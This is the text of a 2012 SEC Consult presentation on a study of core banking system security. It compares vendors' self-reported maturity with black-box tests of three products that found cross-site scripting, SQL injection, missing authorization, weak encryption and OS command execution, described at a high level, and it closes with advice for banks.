Where the money is – Security of CBS

Where the money is. – Security of CBS.

Advisor for your information security.

Version: 1.0Autor: Ulrich FleckVerantwortlich: Ulrich FleckDatum: 27.5.2012Vertraulichkeitsstufe: Public

© 2012 SEC Consult Unternehmensberatung

GmbH – All rights reserved

Title: Where the money is– CBS SecurityVersion/Date: 1.0 / 27.5.2012Responsable: Ulrich FleckConfidentiality Class: Public

2

Agenda

• About SEC Consult

• About the study

• Threats and Drivers for Application Security in CBS

• Maturity of Application Security in CBS

• Security Crash Test of selected CBS products

• Resume

• Discussion




SEC Consult– Who we are

Canada

Singapore

SEC Consult Office

SEC Consult Headquarter

Other SEC Consult Clients

LithuaniaGermany

Austria Central and Easter Europe

• Leading international application security consultancy

• Founded 2002• Headquarters near Vienna,

Austria• Delivery Centers in Austria,

Germany, Lithuania and Singapore

• Strong customer base in Central and Eastern Europe

• Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors)

• 45+ application security experts• Industry focus banks, software

vendors, government




Our Key Question

4

What is the promise and

the reality of

applications security for

core banking systems???




5

Part 1 – Answers provided

• We created a questionnaire with some 50 questions about security especially with regards to core banking systems

• This questionnaire was provided to a preselected set of vendors together with the offer to participate in our study

• We recommended that the IT security responsible person should answers or at least quality assure the questions and answers

• The methodology for the survey part was based common known security standards, best practices and guidelines and the experience of Capgemini and SEC Consult

Part 2 – Security Crash Test at vendor• As the answers to the

questionnaire are just a subjective picture of the vendors themselves we wanted to test perform real life security crash tests ad the vendors

• Therefore we offered all vendors an application security check conducted by SEC Consult consultants

• We asked for access to the respective test system and ensured that those test results will be only published high level in this study and detailed reports about the test case results are handed over solely to the respective vendor




6

Part 1 – Answers provided

• We created a questionnaire with some 50 questions about security especially with regards to core banking systems

• This questionnaire was provided to a preselected set of vendors together with the offer to participate in our study

• We recommended that the IT security responsible person should answers or at least quality assure the questions and answers

• The methodology for the survey part was based common known security standards, best practices and guidelines and the experience of Capgemini and SEC Consult

Part 2 – Security Crash Test at vendor• As the answers to the

questionnaire are just a subjective picture of the vendors themselves we wanted to test perform real life security crash tests ad the vendors

• Therefore we offered all vendors an application security check conducted by SEC Consult consultants

• We asked for access to the respective test system and ensured that those test results will be only published high level in this study and detailed reports about the test case results are handed over solely to the respective vendor

Alternative Part 2 – Security Crash tests at selected banks

• Some of the vendors where quite interested and seriously considering a “Part 2” participation – however none did finally agree

• Therefore we had to consider an alternative solution

• Fortunately three interested banks, showing big interest in this study, gave us the opportunity to perform security crash tests on there system (three CBS in scope of this study)

• The applied methodology was based on common known security standards for applications security, best practices in security tests with a black-box approach and the experience of SEC Consult




CBS Vendors of this Study

7

Major vendors relevant for the international and European market.

Major vendors relevant for the international and European market.




8




Attack surface for core banking systems (simplified)

9

Presentation Layer

Business Logic Tier

Database Layer

Databases

…

…

…

… potential entry points for attacker

…

Network




What did the vendors say?

10

• Information security of vendor organization• Most of the vendors have an Information Security Management System (ISMS) in

place

• Software development organization• Roles and responsibilities in the development process documented in accordance

to security policies• 90-100% of the (core) development staff on applications security

• Methods for secure software development• The enforcement of methods for secure software development Microsoft SDL,

OpenSAMM, BSIMM, CMM-SSE is in progress at some vendors

Threat modeling and security requirement• Most of the vendors have up to date threat model for each CBS module available




What did the vendors say?

11

Security Incident Response• Most of the vendors have Software Security Incident Response Process

• (Technical) standards and best practices for application security• Technical) application security best practices and standards for web

technologies like OWASP, ÖNORM A 7700 (Security requirements for web applications), etc. are already important for vendors

• Data privacy standards for applications like EuroPriSe are not in the focus yet

• No certifications conducted on application security




What did the vendors say about complexity?

12




What did the vendors say? – Internal QA

13

• Identified Security Vulnerabilities from 1.1.2008 till 30.6.2010 by internal QA/testers before the software was released

• Many vendors don’t provide an answer• Range from “none” to hundreds

• Identified Security Vulnerabilities from 1.1.2008 till 30.6.2010 security vulnerabilities in already released software modules (“zero-day vulnerabilities”)

• Many vendors don’t provide an answer• Range from “none” to hundreds




Test coverage for application Security

14

Significant differences in the test coverage for different test approaches between the vendors.

Significant differences in the test coverage for different test approaches between the vendors.




How do you define the maturity level of state of the art (application) security for your CBS product?

15

Highly sophisticated

Mature. Mature.

CMMi Level 4.

strong & impenetrable security foundation

High

Mature.

All vendors position themselves to achieve (at least) state-of-the-art application security. This is a clear and

consistent commitment and promise to the market.

All vendors position themselves to achieve (at least) state-of-the-art application security. This is a clear and

consistent commitment and promise to the market.

30+ years with no known security issues.




Crashtest for 3 CBS (out of 8)

16

Test set-up:• Non of the eight vendor accepted offer for

a free of charge security crash test• 3 major European banks stepped in with 3

product of this study – Thanks!!!• Crash-Test with black-box approach and

limited effort budget (approx. 15 person days for each product)

• Access to CBS with one low privilege user account (standard user)

Test objective for a crash test:• Check for toxic (=seriously insecure)

software• Identify application security vulnerabilities

in CBS to break the confidentiality, availability or integrity of CBS

Source: http://www.spiegel.de/fotostrecke/fotostrecke-22584-3.html




Why attack the CBS from a standard working place?

17

Core Banking System

Browser

The attacker has several choices to get access to a standard working place:•One active Trojan Hoarse malware•Access by cleaning personal, maintenance, contractors, volunteers, etc•Drive-by infection from website(s)•…

Then the attacker starts to look for vulnerabilities to access the Core Banking System in depth…

Standard Working Place for CBS

For the test we used a low privilege user and tried to expand the privileges and to access sensible data of the

Core Banking System.






Hundreds to thousends CBS szandard working places to choose from

18








Standard Blackbox Approach

19

Tasks:• Use selective special tools and scripts for

exploiting security vulnerabilities based on vulnerability classes

• Check compliance to state of the art standards for application security (A7700, OWASP, …)

• Adapt or write new exploit code if necessary• Validate vulnerabilities • Develop proof of concept material (screen

shots, dumps, passwords, etc.)• Assess risk and define recommendation

Presentation Layer

Business Logic Tier

Database Layer

Database

Network

Att

acks




CBS – Cross site scripting

20

• The problem:• A Cross Site Scripting security vulnerability is used to steal the identity information of a CBS user. First

the attacker writes an email to this user with a malicious link, including hidden script code (very short software program). The user receives the email and clicks on that link. The malicious script runs in (the context of) the web browser of the attacked user.

• Vulnerability class:• Web application security Input- and Output Validation

• Impact for bank:• Account theft• Remotely control the web browser• Record all activities of the user• Initiate changes in transactions (e.g. target account numbers of a transaction on the fly).

Secure software development:• Architecture/Design: Failed• Programming: Failed• Test and Quality Assurance: Failed




CBS – Weak encryption

21

• The problem:• First the attacker traces the data traffic between the CBS client and the CBS server.

Due to the weak encryption security vulnerability of the CBS the attacker can bypass the login mechanism.

• Vulnerability class:• Design flaw in client- server communication (hash is being build on the client)

• Impact for bank:• Account theft• Privilege escalation• Perform a misuse of the account of the user





CBS – Privilege escalation – missing authorization

22

• The problem:• By enumerating several request parameters arbitrary accounts can be overtaken and

misused by non privileged users.

• Vulnerability class:• Design flaw based on missing authorization

• Impact for bank:• Account theft• Privilege escalation• The attacker becomes a more powerful user• Access to administrative functionality• The attacker can misuse the CBS by performing high privilege transactions and

functions





CBS – SQL Injection

23

• The problem:• Nothing to add here should be an extinct vulnerability class

• Vulnerability class:• Web application security input–validation & design flaw

• Impact for bank:• Extracts valuable (data theft) data of the database• Manipulate data in the database• Account theft• Privilege escalation





CBS – Direct OS Command execution

24

• The problem:• Several flaws led to access to the underlying operating system for non privileged users.

• Vulnerability class:• Web application security input–validation & design flaw

• Vulnerability class:• Control over the operating system of the server of the CBS. • The CBS system can be shut down or wiped or manipulated with wrong data by the

attacker. • Data of the server can be copied to a repository of the attacker. • Additionally, this vulnerability can be used to attack other systems of the bank• Account theft and privilege escalation• Total compromise of system, data backends etc.





Summarizing

25

3 of 3 tested CBS fail application security standard:•e.g. Open Web Application Security Project (OWASP), WASC, BSI ISi-Reihe (Germany), ÖNORM A 7700 (Austria), etc.)

3 of 3 tested CBS are not state of the art in application security

3 of 3 tested CBS have deficiencies in secure software development•Architecture/Design: Failed•Programming: Failed•Test and Quality Assurance: Failed

FAILED! FAILED!FAILED!

Mature. Mature.

CMMi Level 4.

High

Mature.




Business Impact for Banks

26

• The found vulnerabilities in 3 of 3 tested CBS • enable unauthorized access• disable segregation of duties• circumvent the effectiveness of auditing

and logging• circumvent the effectiveness of strict

access control and enable privilege escalation

and therefore can cause violations of compliance requirements such as Basel II, SAS70, ISO 27001, national Data privacy protection laws, notational banking specific laws, etc.)

26

Presentation Layer

Business Logic Tier

Database Layer

Database

Network

Att

acks




What to do if you are a bank?

27

Demand state-the-art-application security for CBS• Vendor contracts with mandatory state-of-the-art applications security

requirements• Define penalties for not achieving state-of-the-art applications security

requirements • Cost sharing for unsuccessful application security tests

Prove the vendor claims and promises by testing application security of CBS

• Application security tests (Security Quality Gates)

Establish additional multi-lines of defense • Measures to at least temporary mitigate some risks of an insecure CBS on

other levels of defense (infrastructure, organizational, awareness of users, etc.)

The best point in time to detect toxic (=seriously insecure) software is when you buy it.

The best point in time to detect toxic (=seriously insecure) software is when you buy it.



Title: SEC Consult Software Security Assurance ServicesVersion/Date: 1.1/May 2011Responsible: U. FleckConfidentiality Class: Public

Software Vendors already using SEC Consult.




29

How to reach us/me?

Mooslackengasse 17 A-1190 Vienna

Austria

Tel: +43-(0)1-890 30 43-0Fax: +43-(0)1-890 30 43-15

Email: [email protected]

Austria

DirectorSales and Business Development

+43 676 840 301 719

Email: [email protected]

Ulrich Fleck

Technology

Where the money is – Security of CBS